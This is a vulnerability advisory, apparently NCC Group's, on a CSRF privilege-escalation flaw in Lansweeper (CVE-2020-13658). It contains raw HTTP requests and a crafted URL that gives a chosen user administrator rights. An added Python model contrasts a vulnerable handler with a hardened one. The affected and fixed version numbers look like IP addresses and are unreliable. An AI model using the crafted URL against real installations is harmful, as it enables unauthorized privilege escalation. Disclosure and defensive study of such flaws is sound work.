Technical Advisory – Lansweeper Privilege Escalation via CSRF Using HTTP Method Interchange (CVE-2020-13658)
Vendor: Lansweeper Software
Vendor URL: https://www.lansweeper.com/
Versions affected: 18.104.22.168 known affected; other versions likely
Systems Affected: Windows 10
Authors: Joshua Dow, Daniel King
Advisory URL / CVE Identifier: CVE-2020-13658
Risk: High
Summary:
Lansweeper is an application that gathers hardware and software information about computers and other devices on a network for management, compliance and audit purposes. The application also includes a ticket-based help desk system and the ability to push software updates to target devices.
Impact:
An attacker with an existing user account can elevate their privileges within the Lansweeper application by getting an authenticated Lansweeper administrator to browse to a crafted URL.
Details:
Lansweeper allows an administrator to change the roles and permissions granted to a given application user via the /configuration/HelpdeskUsers/HelpdeskusersActions.aspx page. In normal use the application sends a POST request similar to the following when a user's role is changed:

POST /configuration/HelpdeskUsers/HelpdeskusersActions.aspx HTTP/1.1
Host: [LANSWEEPER_URL]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://[LANSWEEPER_URL]/configuration/HelpdeskUsers/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 64
Connection: close
Cookie: ASP.NET_SessionId=0cz3z0ocopzt04ddvo5514fo; UserSettings=language=1; custauth=username=admin&userdomain=admin

userid=4&originalvalue=&permissionselect=2&action=SELECTtblusers
The application also protects its session cookie (ASP.NET_SessionId) with the samesite=lax attribute. This prevents several traditional CSRF vectors, such as the cookie being sent with a cross-site image load or with a form POST submitted from another domain. SameSite=Lax does, however, still attach the cookie to cross-site top-level navigations that use a safe HTTP method such as GET, for example a link the victim clicks or a redirect from an attacker-controlled page.
An attacker can bypass these protections by modifying the previous request to use the GET HTTP method instead of POST and moving the parameters from the POST body into the URL query string. Doing so results in the following:

GET /configuration/HelpdeskUsers/HelpdeskusersActions.aspx?userid=4&originalvalue=&permissionselect=1&action=SELECTtblusers HTTP/1.1
Host: [LANSWEEPER_URL]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://[LANSWEEPER_URL]/configuration/HelpdeskUsers/
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: ASP.NET_SessionId=cpa4aol20zham0xmmcjxjl2e; UserSettings=language=1; custauth=username=admin&userdomain=admin
This can be shortened to the following URL:

http://[LANSWEEPER_URL]/configuration/HelpdeskUsers/HelpdeskusersActions.aspx?userid=4&originalvalue=&permissionselect=1&action=SELECTtblusers
If a Lansweeper administrator browses to the above URL while authenticated to the Lansweeper application, the user specified in the userid parameter will have their privileges set to the level specified in the permissionselect parameter. In this case the user with userid 4 has their permission set to “Administrator + Agent”. Because the request is a top-level navigation, the browser attaches the SameSite=Lax session cookie, and the application processes the query-string parameters exactly as it would the POST body, so neither the cookie attribute nor the original POST form offers any protection.
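The chain above depends on two behaviours working together: the browser's SameSite=Lax rule, which attaches the cookie to a cross-site top-level GET but not to an image load or a cross-site form POST, and a server handler that accepts the same parameters from the query string as from the form body. The following model is an added example, not Lansweeper code and not NCC Group's proof of concept; it replays the request shapes discussed above against a deliberately vulnerable handler and a hardened one. The class and function names, the permissionselect mapping and the anti-CSRF token value are invented for the example.

```python
"""Model of the CSRF chain described above: a browser applying SameSite=Lax and a
server that merges query-string and form parameters. Added illustration only; it
is neither Lansweeper code nor NCC Group's proof of concept. The class and
function names, the permissionselect mapping and the token value are invented."""
from dataclasses import dataclass
from urllib.parse import parse_qs, urlsplit

ACTION_PATH = "/configuration/HelpdeskUsers/HelpdeskusersActions.aspx"
QUERY = "userid=4&originalvalue=&permissionselect=1&action=SELECTtblusers"  # from the advisory
ADMIN_PERMISSION = "Administrator + Agent"
PERMISSION_LEVELS = {"1": ADMIN_PERMISSION, "2": "Helpdesk agent"}  # assumed mapping, example only

@dataclass
class Request:
    method: str
    url: str
    body: str = ""
    top_level: bool = True    # navigation (link, redirect) rather than a subresource (<img>)
    cross_site: bool = False  # initiated from an attacker-controlled site

def lax_cookie_attached(req: Request) -> bool:
    """Browser rule for a SameSite=Lax cookie: sent on every same-site request, but on a
    cross-site request only when it is a top-level navigation using a safe method."""
    if not req.cross_site:
        return True
    return req.top_level and req.method in ("GET", "HEAD", "OPTIONS", "TRACE")

def merged_params(req: Request) -> dict:
    """ASP.NET Request["name"] semantics: the query string is consulted first, then the form
    body, so a GET carrying the parameters in the URL looks identical to the intended POST."""
    params = {k: v[0] for k, v in parse_qs(urlsplit(req.url).query).items()}
    for k, v in parse_qs(req.body).items():
        params.setdefault(k, v[0])
    return params

class HelpdeskUsersActions:  # stand-in for the page, invented for this example
    def __init__(self):
        self.users = {4: "Normal user"}
        self.csrf_token = "t0k3n"  # per-session token the hardened handler expects in the body

    def _admin_session(self, req: Request) -> bool:
        # The model treats "session cookie attached" as "valid admin session".
        return lax_cookie_attached(req)

    def _apply(self, p: dict) -> str:
        if p.get("action") == "SELECTtblusers" and "userid" in p:
            self.users[int(p["userid"])] = PERMISSION_LEVELS[p["permissionselect"]]
            return "updated"
        return "ignored"

    def vulnerable(self, req: Request) -> str:
        """Accepts any HTTP method and any parameter source."""
        if not self._admin_session(req):
            return "unauthenticated"
        return self._apply(merged_params(req))

    def hardened(self, req: Request) -> str:
        """Requires POST, reads the form body only, and checks a per-session anti-CSRF token."""
        if not self._admin_session(req):
            return "unauthenticated"
        if req.method != "POST":
            return "method not allowed"
        p = {k: v[0] for k, v in parse_qs(req.body).items()}  # query string deliberately ignored
        if p.get("csrftoken") != self.csrf_token:
            return "bad csrf token"
        return self._apply(p)

def run_scenarios() -> dict:
    """Replay the request shapes the advisory discusses against both handlers.
    Returns {name: (vulnerable result, hardened result, user 4 after each)}."""
    scenarios = {
        "img_tag":         Request("GET", ACTION_PATH + "?" + QUERY, top_level=False, cross_site=True),
        "cross_site_post": Request("POST", ACTION_PATH, body=QUERY, cross_site=True),
        "link_click":      Request("GET", ACTION_PATH + "?" + QUERY, cross_site=True),
        "legit_post":      Request("POST", ACTION_PATH, body=QUERY + "&csrftoken=t0k3n"),
    }
    results = {}
    for name, req in scenarios.items():
        v, h = HelpdeskUsersActions(), HelpdeskUsersActions()
        results[name] = (v.vulnerable(req), h.hardened(req), v.users[4], h.users[4])
    return results

if __name__ == "__main__":
    for name, outcome in run_scenarios().items():
        print(f"{name:16s} vulnerable={outcome[0]:18s} hardened={outcome[1]}")
```

Only the link_click scenario reaches the vulnerable handler with a session cookie, and it succeeds there because the handler neither restricts the method nor distinguishes query-string from form parameters; the hardened handler rejects it on the method check before any token comparison. The model leaves out one further caveat worth knowing: some browsers temporarily attach a Lax cookie to cross-site POSTs for a short window after the cookie is set (Chrome's "Lax + POST" behaviour), which is one more reason SameSite alone is not a CSRF defence.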
Recommendation:
- Update to the latest version of Lansweeper, which at the time of writing is 22.214.171.124.
- Restrict access to the Lansweeper management console as much as possible, ideally limiting it to a small set of highly trusted users.
- If possible, use a separate browser whose only purpose is accessing and managing the Lansweeper application, so that an administrator's Lansweeper session is never present in a browser that also visits untrusted sites.
Vendor Communication:
- May 14th, 2020 – NCC Group reached out to Lansweeper to identify appropriate security contact.
- May 19th, 2020 – Lansweeper opens a case with their development team to look into the issue.
- May 28th, 2020 – NCC Group registers the associated CVE.
- May 28th, 2020 – NCC Group follows up with Lansweeper, and provides them with reserved CVE number.
- June 8th, 2020 – Lansweeper formally acknowledges the vulnerability but says a patch will take time, and notes a beta version can be provided by July 17th 2020.
- July 13th, 2020 – Lansweeper provides NCC Group with a beta version of their product with their initial fix.
- July 14th, 2020 – Lansweeper provides NCC Group with a license to use the beta product.
- July 21st, 2020 – NCC Group investigates the fix and notifies Lansweeper that the CSRF protections implemented are fragile and only protect one endpoint.
- July 30th, 2020 – Lansweeper replies stating that NCC Group’s feedback on the patch was received and forwarded to the development team.
- August 13th, 2020 – Lansweeper publishes their patch notes.
- September 4th, 2020 – NCC Group reaches out to Lansweeper to confirm if feedback on the patch was received and is being incorporated. Lansweeper informs NCC Group that they have agreed internally to incorporate feedback into a new patch targeting September 18th and requests that the advisory be postponed to accommodate. NCC Group agrees.
- September 15th, 2020 – NCC Group reaches back out to Lansweeper to see if the updated patch is still expected to be ready to go on September 18th.
- September 18th, 2020 – Lansweeper shows NCC Group some of the changes being incorporated into the patch and explains that it is not ready for public push yet.
- September 18th, 2020 – NCC Group proposes to delay vulnerability publication until September 25th.
- September 22nd, 2020 – Lansweeper agrees to publication of the vulnerability on September 25th.
- September 25th, 2020 – Advisory published
Thanks to:
The security team at Lansweeper, Inc.
About NCC Group:
NCC Group is a global expert in cyber security and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape.
With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate and respond to the risks they face.
We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.